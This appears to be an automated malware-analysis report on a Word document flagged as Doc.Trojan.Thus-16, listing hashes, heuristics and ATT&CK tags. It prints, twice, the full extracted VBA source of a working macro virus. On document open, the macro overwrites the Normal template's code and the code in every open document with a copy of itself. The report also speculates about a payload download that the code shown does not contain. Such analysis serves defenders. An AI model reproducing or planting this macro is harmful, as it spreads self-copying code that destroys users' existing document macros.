Office (OLE) malware analysis — malicious · afca61da171a02d1

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-11-29 16:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 21c8c05ce6fa878a970991e047ef9fbb SHA-1: 91000706cf623a553b3da51a0386b96ad62a9e65 SHA-256: afca61da171a02d197bd91e83317b5d8e6611c21bf2af291386fe212937efdd4

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OLE document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro code appears to copy itself to the Normal template and other open documents, potentially to ensure persistence or spread. The ClamAV detection as 'Doc.Trojan.Thus-16' strongly suggests malicious intent, likely to download and execute a secondary payload.

Heuristics 3

ClamAV: Doc.Trojan.Thus-16 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Thus-16
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1956 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1956 bytes
SHA-256: `db471a05f0d41b2d7c06ce712fe93c2b9d150669e4d5fda83b2ab2eef320fdc9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Sub Document_Open() 'Mat1' On Error Resume Next Application.Options.VirusProtection = True If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _ NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _ 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _ (1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) End If For k = 1 To Application.Documents.Count If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _ 1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _ 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _ (1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) End If Next k End Sub

SHA-256: db471a05f0d41b2d7c06ce712fe93c2b9d150669e4d5fda83b2ab2eef320fdc9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Document_Open()
'Mat1'
   On Error Resume Next
   Application.Options.VirusProtection = True
   If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   End If
   
   If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _
   1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
   (1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
   End If
   
   
   
   For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
        1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _
        1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _
        (1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    End If
   Next k
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.